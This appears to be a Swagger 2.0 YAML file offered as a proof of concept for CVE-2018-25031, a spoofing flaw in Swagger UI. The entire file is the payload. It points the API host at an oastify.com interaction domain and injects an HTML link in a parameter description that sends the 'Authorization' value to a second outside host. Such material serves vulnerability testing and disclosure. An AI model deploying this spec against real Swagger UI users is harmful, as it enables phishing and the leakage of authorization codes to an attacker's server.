swagger: '2.0'
info:
  version: 1.0.0
  title: Swagger CVE-2018-25031
  description: A simple POC CVE-2018-25031
schemes: 
- https
host: 3y2i1q8caklyqj8jq01afkx7qywpko8d.oastify.com
basePath: /v1
paths:
  /data/{Authorization}:
   get:
      parameters:
      - description: |
          You need to add the <b>Authorization Code</b> to use the API.
          Please check this <a href=https://9nxoqwxizqa4fpxpf6qg4qmdf4lv9oxd.oastify.com/#{Authorization}><b>link</b></a>
        format: int64
        in: path
        name: Authorization
        required: true
        type: string
      tags:
      - Swagger POC CVE 2018-25031
      operationId: afine
      summary: POC
      
